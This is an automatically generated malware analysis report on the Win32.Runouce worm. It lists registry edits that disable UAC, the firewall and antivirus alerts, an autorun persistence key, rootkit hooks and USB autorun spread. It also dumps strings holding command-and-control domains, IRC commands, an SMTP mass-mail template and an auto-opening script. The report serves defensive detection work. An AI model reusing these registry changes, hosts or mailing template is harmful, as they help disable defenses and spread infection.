Win32.Runouce.Bmm_d1a9eb22ca

by malwarelabrobot on February 8th, 2017 in Malware Descriptions.

HEUR:Virus.Win32.Generic (Kaspersky), Win32.Runouce.B@mm (B) (Emsisoft), Win32.Runouce.B@mm (AdAware), Virus.Win32.Sality.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR, VirusVirut.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: d1a9eb22ca68f5fdb8e4321176bfc55b
SHA1: 358ba3fa89e2158a7d3f3c28e89f1f7622dec259
SHA256: f6a9828a2c33a460564296690e14c058c4ff904064095d7d037cd37ed1a8a595
SSDeep: 6144:eBODRHr8GayPVxR3SMoKSRbBigwmL5GWJdV6bg:eBUHQS7R3loztBrG47
Size: 318460 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-02-09 16:07:45
Analyzed on: Windows7 SP1 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Worm creates the following process(es):
No processes have been created.
The Worm injects its code into the following process(es):

%original file name%.exe:1780
%original file name%.exe:1908
taskhost.exe:1940
Dwm.exe:2008
Explorer.EXE:2024
conhost.exe:2520

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1780 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Windows\system.ini (70 bytes)
C:\chkc.exe (130 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\reader_sl.exe (1312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\winfmngob.exe (741 bytes)
C:\autorun.inf (279 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (784 bytes)

The Worm deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\winfmngob.exe (0 bytes)

The process %original file name%.exe:1908 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

C:\Windows\System32\runouce.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2744 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (3288 bytes)

Registry activity

The process %original file name%.exe:1780 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Aas]
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Aas]
"a3_71" = "525712590"
"a3_76" = "561686245"
"a3_77" = "568613636"
"a3_74" = "513568291"
"a3_75" = "554631746"
"a4_100" = "716912100"
"a4_101" = "724081221"
"a2_59" = "422984450"
"a2_58" = "415802968"
"a2_53" = "379972038"
"a2_52" = "372799793"
"a2_51" = "365619674"
"a2_50" = "358449583"
"a2_57" = "408634468"
"a2_56" = "401466235"
"a2_55" = "394299729"
"a2_54" = "387136433"
"a4_55" = "394301655"
"a4_54" = "387132534"
"a4_57" = "408639897"
"a4_56" = "401470776"
"a4_51" = "365625171"
"a4_50" = "358456050"
"a4_53" = "379963413"
"a4_52" = "372794292"

[HKCU\Software\Aas\695404737]
"50183847" = "26CEFB056C4C612B18DF8A4E39AD3E086BC14A679A0C16609597EAFA4EF436B86480FE516A315D6A51F28DA8CC0B11C7B9B304C866869787A103BDFE12342ED26176866CF93A99E8E0CDB62E08DCA2F8E5A923A228BAEAE68DD518B021F8E826E6A8FDBA0704B9328FCAEA4242FC6AF4104D60B896922EC0CEDBAF6F67E08E9F"

[HKCU\Software\Aas]
"a4_59" = "422978139"
"a4_58" = "415809018"

[HKCU\Software\Aas\695404737]
"21507363" = "0"

[HKCU\Software\Aas]
"a3_94" = "690598327"
"a3_95" = "698045910"
"a3_96" = "671534665"
"a3_97" = "678453992"
"a3_90" = "662052915"
"a3_91" = "669107282"
"a3_92" = "643004661"
"a3_93" = "649993492"
"a3_98" = "685967115"
"a3_99" = "726580138"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKCU\Software\Aas]
"a2_99" = "709742340"
"a2_98" = "702576277"
"a2_97" = "695413740"
"a2_96" = "688241421"
"a2_95" = "681058818"
"a2_94" = "673891358"
"a2_93" = "666726084"
"a2_92" = "659556418"
"a2_91" = "652381760"
"a2_90" = "645224189"
"a1_58" = "3665371554"
"a1_59" = "3383193877"
"a1_56" = "776211010"
"a1_57" = "3096474560"
"a1_54" = "622265903"
"a1_55" = "2017316994"
"a1_52" = "638804490"
"a1_53" = "1560123974"
"a1_50" = "4267342224"
"a1_51" = "2008350609"
"a3_43" = "324843106"
"a3_42" = "284237251"
"a3_41" = "277248416"
"a3_40" = "269796609"
"a3_47" = "353765350"
"a3_46" = "313221959"
"a3_45" = "305778468"
"a3_44" = "332278405"
"a3_49" = "368270520"
"a3_48" = "360822809"
"a4_99" = "709742979"
"a4_98" = "702573858"
"a4_91" = "652390011"
"a4_90" = "645220890"
"a4_93" = "666728253"
"a4_92" = "659559132"
"a4_95" = "681066495"
"a4_94" = "673897374"
"a4_97" = "695404737"
"a4_96" = "688235616"
"a3_101" = "707522668"
"a3_100" = "733503437"
"a3_70" = "485103791"

[HKCU\Software\Aas\695404737]
"35845605" = "383"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_89" = "1586180983"
"a1_88" = "803751692"
"a1_85" = "3909588577"
"a1_84" = "1311025949"
"a1_87" = "1816827822"
"a1_86" = "1403657822"
"a1_81" = "1387330828"
"a1_80" = "3564317705"
"a1_83" = "1132120614"
"a1_82" = "1931154089"
"a1_67" = "3223544122"
"a1_66" = "3611810380"
"a1_65" = "2815399669"
"a1_64" = "3666968892"
"a1_63" = "2098580106"
"a1_62" = "3507496498"
"a1_61" = "332242240"
"a1_60" = "3182891493"
"a1_69" = "283849579"
"a1_68" = "1609745042"
"a1_12" = "1174665665"
"a1_13" = "4076776892"
"a1_10" = "1071546649"
"a1_11" = "2318739959"
"a1_16" = "1472144990"
"a1_17" = "3772702960"
"a1_14" = "4170948361"
"a1_15" = "247433699"
"a1_18" = "1449162629"
"a1_19" = "3052690794"
"a2_48" = "344126011"
"a2_49" = "351278618"
"a2_40" = "286766458"
"a2_41" = "293932015"
"a2_42" = "301100597"
"a2_43" = "308266908"
"a2_44" = "315449677"
"a2_45" = "322613994"
"a2_46" = "329785115"
"a2_47" = "336951251"
"a4_42" = "301103082"
"a4_43" = "308272203"
"a4_40" = "286764840"
"a4_41" = "293933961"
"a4_46" = "329779566"
"a4_47" = "336948687"
"a4_44" = "315441324"
"a4_45" = "322610445"
"a4_48" = "344117808"
"a4_49" = "351286929"
"a3_18" = "112354555"
"a3_19" = "152901914"
"a3_14" = "83367783"
"a3_15" = "124488582"
"a3_16" = "131411001"
"a3_17" = "104906840"
"a3_10" = "88506851"
"a3_11" = "95435266"
"a3_12" = "69459621"
"a3_13" = "76378820"
"a4_37" = "265257477"
"a4_36" = "258088356"
"a4_35" = "250919235"
"a4_34" = "243750114"
"a4_33" = "236580993"
"a4_32" = "229411872"
"a4_31" = "222242751"
"a4_30" = "215073630"
"a4_39" = "279595719"
"a4_38" = "272426598"

[HKCU\Software\Aas\695404737]
"28676484" = "35"

[HKCU\Software\Aas]
"a1_101" = "2819443449"
"a2_88" = "630888401"
"a2_89" = "638057599"
"a2_84" = "602206565"
"a2_85" = "609372177"
"a2_86" = "616539373"
"a2_87" = "623721910"
"a2_80" = "573523851"
"a2_81" = "580705329"
"a2_82" = "587874101"
"a2_83" = "595039398"
"a1_29" = "2974281407"
"a1_28" = "3228685785"
"a1_23" = "1393522403"
"a1_22" = "767601794"
"a1_21" = "3088289700"
"a1_20" = "1050578346"
"a1_27" = "889908127"
"a1_26" = "675954575"
"a1_25" = "2922091070"
"a1_24" = "2020335726"
"a3_50" = "341766363"
"a3_51" = "348755322"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_53" = "396796476"
"a3_54" = "370165343"
"a3_55" = "377748222"
"a3_56" = "384737041"
"a3_57" = "425210800"
"a3_58" = "432789459"
"a3_59" = "406145138"

"a2_31" = "222234361"
"a2_30" = "215079550"
"a2_33" = "236579903"
"a2_32" = "229414781"
"a2_35" = "250911624"
"a2_34" = "243747348"
"a2_37" = "265263361"
"a2_36" = "258081705"
"a2_39" = "279598592"
"a2_38" = "272431981"
"a4_79" = "566360559"
"a4_78" = "559191438"
"a4_73" = "523345833"
"a4_72" = "516176712"
"a4_71" = "509007591"
"a4_70" = "501838470"
"a4_77" = "552022317"
"a4_76" = "544853196"
"a4_75" = "537684075"
"a4_74" = "530514954"
"a4_86" = "616544406"
"a4_87" = "623713527"
"a4_84" = "602206164"
"a4_85" = "609375285"
"a4_82" = "587867922"
"a4_83" = "595037043"
"a4_80" = "573529680"
"a4_81" = "580698801"
"a4_88" = "630882648"
"a4_89" = "638051769"
"a2_100" = "716903321"

[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "152"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas]
"a1_98" = "2645168756"
"a1_99" = "317835327"
"a1_92" = "479923809"
"a1_93" = "2617805663"
"a1_90" = "91595604"
"a1_91" = "2057942215"
"a1_96" = "2898512924"
"a1_97" = "2728917768"
"a1_94" = "4239588295"
"a1_95" = "1819763499"
"a2_75" = "537689948"
"a2_74" = "530522317"
"a2_77" = "552013931"
"a2_76" = "544854311"
"a2_71" = "509015248"
"a2_70" = "501835868"
"a2_73" = "523339378"
"a2_72" = "516171623"
"a1_100" = "1709071803"
"a2_79" = "566353306"
"a2_78" = "559186802"

"a1_74" = "826027859"
"a1_75" = "1345752357"
"a1_76" = "672156095"
"a1_77" = "4190342251"
"a1_70" = "3035074501"
"a1_71" = "528275036"
"a1_72" = "3427455530"
"a1_73" = "2262222866"
"a1_78" = "3120882369"
"a1_79" = "1365400886"
"a1_0" = "3299283285"
"a1_1" = "3386940473"
"a1_2" = "3712339979"
"a1_3" = "2620474486"
"a1_4" = "83174613"
"a1_5" = "616562248"
"a1_6" = "454656014"
"a1_7" = "2401786110"
"a3_29" = "224867540"
"a3_28" = "183865525"
"a1_9" = "2948510009"
"a3_21" = "167399900"
"a3_20" = "159956413"
"a3_23" = "148336286"
"a3_22" = "140888703"
"a3_25" = "195929936"
"a3_24" = "188875569"
"a3_27" = "176880658"
"a3_26" = "169827315"
"a4_24" = "172058904"
"a4_25" = "179228025"
"a4_26" = "186397146"
"a4_27" = "193566267"
"a4_20" = "143382420"
"a4_21" = "150551541"
"a4_22" = "157720662"
"a4_23" = "164889783"
"a4_28" = "200735388"
"a4_29" = "207904509"
"a2_101" = "724077854"
"a1_38" = "213872447"
"a1_39" = "3964775043"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_30" = "2646907918"
"a1_31" = "3886322426"
"a1_32" = "1167938370"
"a1_33" = "2462240188"
"a1_34" = "2225036716"
"a1_35" = "370808629"
"a1_36" = "2012235382"
"a1_37" = "3198637671"
"a3_69" = "478110732"
"a3_68" = "470664173"
"a3_65" = "449123976"
"a3_64" = "442135145"
"a3_67" = "497168202"
"a3_66" = "489720619"
"a3_61" = "454263092"
"a3_60" = "413199509"
"a3_63" = "468244982"
"a3_62" = "461186391"
"a2_28" = "200730413"
"a2_29" = "207899426"
"a2_26" = "186388573"
"a2_27" = "193573873"
"a2_24" = "172061634"
"a2_25" = "179228956"
"a2_22" = "157728729"
"a2_23" = "164896728"
"a2_20" = "143379083"
"a2_21" = "150544185"
"a4_68" = "487500228"
"a4_69" = "494669349"
"a4_60" = "430147260"
"a4_61" = "437316381"
"a4_62" = "444485502"
"a4_63" = "451654623"
"a4_64" = "458823744"
"a4_65" = "465992865"
"a4_66" = "473161986"
"a4_67" = "480331107"
"a2_7" = "50176954"
"a2_6" = "43009444"
"a2_5" = "35841042"
"a2_4" = "28673537"
"a2_3" = "21498089"
"a2_2" = "14346572"
"a2_1" = "7173091"
"a2_0" = "9832"
"a2_9" = "64528830"
"a2_8" = "57360172"
"a4_5" = "35845605"
"a4_4" = "28676484"
"a4_7" = "50183847"
"a4_6" = "43014726"
"a4_1" = "7169121"
"a4_0" = "0"
"a4_3" = "21507363"
"a4_2" = "14338242"
"a4_9" = "64522089"
"a4_8" = "57352968"
"a3_52" = "389745053"
"a3_87" = "607024862"
"a3_86" = "633131711"
"a3_85" = "626081308"
"a3_84" = "585598461"
"a3_83" = "578085210"
"a3_82" = "571034939"
"a3_81" = "597665944"
"a3_80" = "590099577"
"a3_89" = "654610320"
"a3_88" = "614067057"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKCU\Software\Aas]
"a1_8" = "310532945"
"a2_62" = "444493003"
"a2_63" = "451653186"
"a2_60" = "430153701"
"a2_61" = "437320717"
"a2_66" = "473168804"
"a2_67" = "480337451"
"a2_64" = "458821396"
"a2_65" = "465987022"
"a2_68" = "487503795"
"a2_69" = "494671922"
"a1_41" = "1175678420"
"a1_40" = "3112489572"
"a1_43" = "812055938"
"a1_42" = "608335292"
"a1_45" = "2664743508"
"a1_44" = "806423141"
"a1_47" = "3114940119"
"a1_46" = "382469827"
"a1_49" = "1624578760"
"a1_48" = "262978150"

[HKCU\Software\Aas\695404737]
"43014726" = "0A00687474703A2F2F6163656D6F676C75737563756B6C6172692E636F6D2E74722F696D616765732F6C6F676F2E67696600687474703A2F2F612D6272696E672E636F6D2F73616E79626F6F6B2F6C6F676F2E67696600687474703A2F2F746E36396162692E636F6D2F696D616765732F6C6F676F662E67696600687474703A2F2F67696D382E706C2F6C6F676F2E67696600687474703A2F2F61636C617373616C657274732E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E3370696E6469612E696E2F696D616765732F6C6F676F2E67696600687474703A2F2F6163692E6772617469782E636F6D2E62722F6C6F676F2E67696600687474703A2F2F3173327176683931782E736974652E61706C75732E6E65742F696D616765732F6C6F676F2E67696600687474703A2F2F6162622E696E642E696E2F6C6F676F2E67696600687474703A2F2F7777772E616B70617274697361726976656C696C65722E636F6D2F696D616765732F696D672E676966"

[HKCU\Software\Aas]
"a3_36" = "241268621"
"a3_37" = "248309804"
"a3_34" = "260325067"
"a3_35" = "267899754"
"a3_32" = "212854281"
"a3_33" = "253401768"
"a3_30" = "231909751"
"a3_31" = "205278614"
"a3_38" = "289377359"
"a3_39" = "296296686"

"a2_17" = "121878036"
"a2_16" = "114708582"
"a2_15" = "107543232"
"a2_14" = "100362012"
"a2_13" = "93206883"
"a2_12" = "86027549"
"a2_11" = "78860252"
"a2_10" = "71693673"
"a2_19" = "136209430"
"a2_18" = "129046589"
"a4_11" = "78860331"
"a4_10" = "71691210"
"a4_13" = "93198573"
"a4_12" = "86029452"
"a4_15" = "107536815"
"a4_14" = "100367694"
"a4_17" = "121875057"
"a4_16" = "114705936"
"a4_19" = "136213299"
"a4_18" = "129044178"
"a3_8" = "40388897"
"a3_9" = "47967552"
"a3_6" = "59977839"
"a3_7" = "67032206"
"a3_4" = "11991981"
"a3_5" = "52535244"
"a3_2" = "31040235"
"a3_3" = "4933386"
"a3_0" = "17001001"
"a3_1" = "23989832"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The process %original file name%.exe:1908 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runonce" = "C:\Windows\system32\runouce.exe"

Dropped PE files

MD5 File path
516a83a3c69a76442df26b1bb7f71a4b c:\chkc.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Worm installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: Microsoft Corporation
Product Name: OLEViewer
Product Version: 2.1
Legal Copyright: Copyright (c) 1993-96 Microsoft Corporation. All Rights Reserved.
Legal Trademarks: By Charlie Kindel, Michael Nelson, and Michael Antonio
Original Filename: oleview.EXE
Internal Name: OLEViewer
File Version: 2.10.050
File Description: OLEViewer Version 2.1
Comments: OLE/COM Object Viewer 2.1
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 110592 110592 4.19064 8c726ddd40d62c42b05a31986c2fdc4f
.data 114688 2424 2048 2.90468 2590b7d371c8e57df2df83a3770a3762
.rsrc 118784 45428 45568 2.90377 1cc2f56f86438219852cdf89a0340dc3
.reloc 167936 155652 156156 5.439 4e20c20e4f900778903b10cb7e5aac26

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
meggay.com 31.192.108.36
regexy.com 88.99.25.106


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

The Worm connects to the servers at the folowing location(s):

%original file name%.exe_1908:

.text
.data
.rsrc
@.reloc
Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
iviewers.dll
IVIEWERS.DLL
Component Categories\%s
comcat.dll
Comcat.DLL
CLSID\%s
%s - %s. By Charlie Kindel,
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
CoCreateInstance failed using the CLSID for '%s'
All HKEY_CLASSES_ROOT\Component Categories Entries
All HKEY_CLASSES_ROOT\APPID Entries
OLE32.DLL
msjava.dll
Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|
Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|
%d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
REGEDIT.EXE
LoadTypeLib( %s ) failed.
*.tlb
The %s interface viewer failed to load.
Could not convert the CLSID of the %s interface viewer.
Interface\%S\OLEViewerIViewerCLSID
Interface\%S
The file droped (%s) is not a valid persistent OLE object or Type Library file.
%s\Insertable
%s\NotInsertable
2disp.dll
2.dll
2prox.dll
aut32.dll
cnv32.dll
2pr32.dll
prx32.dll
32.dll
%s <no name>
%s\Implemented Categories\%s
%S <no name>
[AppID: %s]
AppID\%s
%s (Ver %s)
QueryInterface for %s returned a failure code other than E_NOINTERFACE.
IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
_%S <no name>
LoadRegTypeLib(%s, %u, %u, %lu, ...) failed.
Warning: MkParseDisplayName only ate up to "%s".
MkParseDisplayName(... "%s" ...) failed.
%s (%s)
LoadRegTypeLib(%u, %u, %lu, &u ...) failed.
classid="clsid:%S"
FileType\%s
Interface\%s
TypeLib\%s
%s = %s
%s [%s] = %s
%s [<no name>] = %s
%#04XX (%lu)
%s\%s
Couldn't get address of SedDiscrectionaryAclEditor() in ACLEDIT.DLL!
Couldn't load ACLEDIT.DLL!
ACLEDIT.DLL
APPID\%s
CLSID\%s\%s
CLSID\%s\LocalServer32
FACILITY_WINDOWS
VIEW_S_FIRST...VIEW_S_LAST
VIEW_E_FIRST...VIEW_E_LAST
REGDB_S_FIRST...REGDB_S_LAST
REGDB_E_FIRST...REGDB_E_LAST
OLE_S_FIRST...OLE_S_LAST
OLE_E_FIRST...OLE_E_LAST
OLEOBJ_S_FIRST...OLEOBJ_S_LAST
OLEOBJ_E_FIRST...OLEOBJ_E_LAST
MK_S_FIRST...MK_S_LAST
MK_E_FIRST...MK_E_LAST
MARSHAL_S_FIRST...MARSHAL_S_LAST
MARSHAL_E_FIRST...MARSHAL_E_LAST
INPLACE_S_FIRST...INPLACE_S_LAST
INPLACE_E_FIRST...INPLACE_E_LAST
ENUM_S_FIRST...ENUM_S_LAST
ENUM_E_FIRST...ENUM_E_LAST
DRAGDROP_S_FIRST...DRAGDROP_S_LAST
DRAGDROP_E_FIRST...DRAGDROP_E_LAST
DATA_S_FIRST...DATA_S_LAST
DATA_E_FIRST...DATA_E_LAST
CO_S_FIRST...CO_S_LAST
CO_E_FIRST...CO_E_LAST
CONVERT10_S_FIRST...CONVERT10_S_LAST
CONVERT10_E_FIRST...CONVERT10_E_LAST
CLIPBRD_S_FIRST...CLIPBRD_S_LAST
CLIPBRD_E_FIRST...CLIPBRD_E_LAST
CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST
CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST
CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST
CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST
CACHE_S_FIRST...CACHE_S_LAST
CACHE_E_FIRST...CACHE_E_LAST
REGDB_E_KEYMISSING
OLE_E_ADVISENOTSUPPORTED
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
CACHE_S_FORMATETC_NOTSUPPORTED
severity: %s, facility: %s ($lX)
range: %s ($lX)
%s ($lX)
<No system message defined> %s
%s %s
~$SSh
PQSSh
MFC42.DLL
__p__acmdln
MSVCRT.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyA
RegOpenKeyA
RegDeleteKeyA
RegQueryInfoKeyA
RegCreateKeyExA
ADVAPI32.dll
WinExec
KERNEL32.dll
GDI32.dll
USER32.dll
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
VERSION.dll
DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|
.?AVCCmdTarget@@
TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
.PAVCException@@
AllFiles(*.*)|*.*|
.PAVCOleException@@
7 7$7(7,7074787<7@7
9 9$9(9,9
;!<4<:<@<_<
5o6Z6
6 737_7}7
t`{R %D
k%D">
-sv.DYr6
$=%c(
aUM.Yul
#.tY]@
7=e6%d
r.rW-
%f!",
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
fbibiz.com
olmbra.com
meggay.com
regexy.com
inreos.com
NICK yhzlxkjy
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x  *%s
KERNEL32.DLL
windowsupdate
drweb
.Access
oleview.hlp
2.10.050
oleview.EXE
To select a class: Double click the name or highlight the name with the cursor keys and press return.
OLEViewer Files (*.ore)
oleview.Document
Replace%Select the entire document
.Bind to a file via a File Moniker
Show OLE 1.0 Objects@Show objects that have the NotInsertable key.
Show ContainersGShow Objects that have the Control key (OLE Controls)
Delete from RegistryAShow Objects that have the Insertable Key
 Run the Windows Registry Editor
Microsoft^Could not find IVIEWERS.DLL to auto-register the ITypeLib and IDataObject interface viewers.
mOLEViewer will operate correctly without this DLL, however you will not be able to use the interface viewers.<Could not find DllRegisterServer function in IVIEWERS.DLL.
B Do you want to try to find IVIEWERS.DLL in a different location? DllRegisterServer in IVIEWERS.DLL failed.
;Could not find COMCAT.DLL (Component Categories Manager).
rOLEViewer will operate correctly without this DLL, however you will not be able to fully use component categories.:Could not find DllRegisterServer function in COMCAT.DLL.
@ Do you want to try to find COMCAT.DLL in a different location?
.Display the viewer for the selected item.
View0Show or do not show hidden component categories.LToggle the display of component categories that are not meant to be visible.[Create an instance of the selected object on a specific machine.
Create Instance On MachineBEnables or disables "ActivateAtStorage" activation for this class.5View and set the Network OLE options for this object.0Configure class activation and security options.-Change machine wide Distributed COM settings.KUse CLSCTX_REMOTE_SERVER when calling CoGetClassObject
CLSCTX_REMOTE_SERVER>Copy the GUID of the currently selected item to the clipboard..Toggle between expert and novice display mode.9Copy an HTML <object> tag for this item to the clipboard.
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
#Unable to load mail system support.

%original file name%.exe_1908_rwx_00200000_00008000:

ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
fbibiz.com
olmbra.com
meggay.com
regexy.com
inreos.com
NICK xaxclarv
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x  *%s
KERNEL32.DLL
windowsupdate
drweb
C:\Windows\system32\winlogon.exe:*:enabled:@shell32.dll,-1
UNC\192.168.50.163\SANDBOXOUTPUT\2017-02-07\D1A9EB22CA68F5FDB8E4321176BFC55B\DUMPS\D1A9EB22CA68F5FDB8E4321176BFC55B.EXE_1908.DMP
%WinDir%\SYSTEM32\MAGNIFY.EXE
\WMPLAYER.EXE
cfpgya.com
ejylfj.com
qieehu.com
hnvexz.com
uludor.com
gebcni.com
hhgjyy.com
diirju.com
ieshlm.com
vqbpsk.com
hcodyf.com
agdgez.com
eetuyq.com
gidsod.com
eueguu.com
noodwq.com
ekvvza.com
nytuli.com
zyrxex.com
uadaxq.com
jylylf.com
xkdufo.com
ovdabc.com
wynlif.com
cyatgj.com
kehvgg.com
ohjsqr.com
mlokdp.com
rrucez.com
diizld.com
ajtgle.com
kkixxi.com
cviiod.com
esyayz.com
ycaymz.com
auheyr.com
iwapuz.com
aotoaj.com
hbjpnf.com
aoxaid.com
orpgsr.com
zyciin.com
ocyuli.com
yyewqz.com
grsemy.com
gxxkpm.com
ylmzcy.com
vxypfp.com
pghgbu.com
ckdqid.com
rlaxnq.com
faeqfs.com
oodpfj.com
eeilha.com
hokmku.com
obteba.com
asrioy.com
uoetae.com
kfzoxs.com
nfujxn.com
lcrdra.com
kcyscc.com
muywrv.com
zpxjxo.com
uovvfp.com
iqlmoa.com
iepiyj.com
aozbcg.com
pjhoar.com
gngyaw.com
bywnji.com
kkenkt.com
yyduaq.com
ugiiip.com
eaueea.com
yjeapy.com
vhedkw.com
kfoakj.com
fvkskk.com
biudfz.com
cetiiq.com
emyoxs.com
yirdap.com
wpywnc.com
uhhaoo.com
zeassp.com
zdakxj.com
bbhpao.com
ngfpvb.com
winios.com
bczybs.com
docarc.com
wurlvy.com
aiabpf.com
nureak.com
yefify.com
oacaky.com
xhirla.com
afrofp.com
smtnia.com

%original file name%.exe_1908_rwx_00210000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.reloc

%original file name%.exe_1780:

.text
.data
.rsrc
@.reloc
Warning! Certain features of this program may be unavailable to you because you are not logged in as an administrator.
iviewers.dll
IVIEWERS.DLL
Component Categories\%s
comcat.dll
Comcat.DLL
CLSID\%s
%s - %s. By Charlie Kindel,
The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
CoCreateInstance failed using the CLSID for '%s'
All HKEY_CLASSES_ROOT\Component Categories Entries
All HKEY_CLASSES_ROOT\APPID Entries
OLE32.DLL
msjava.dll
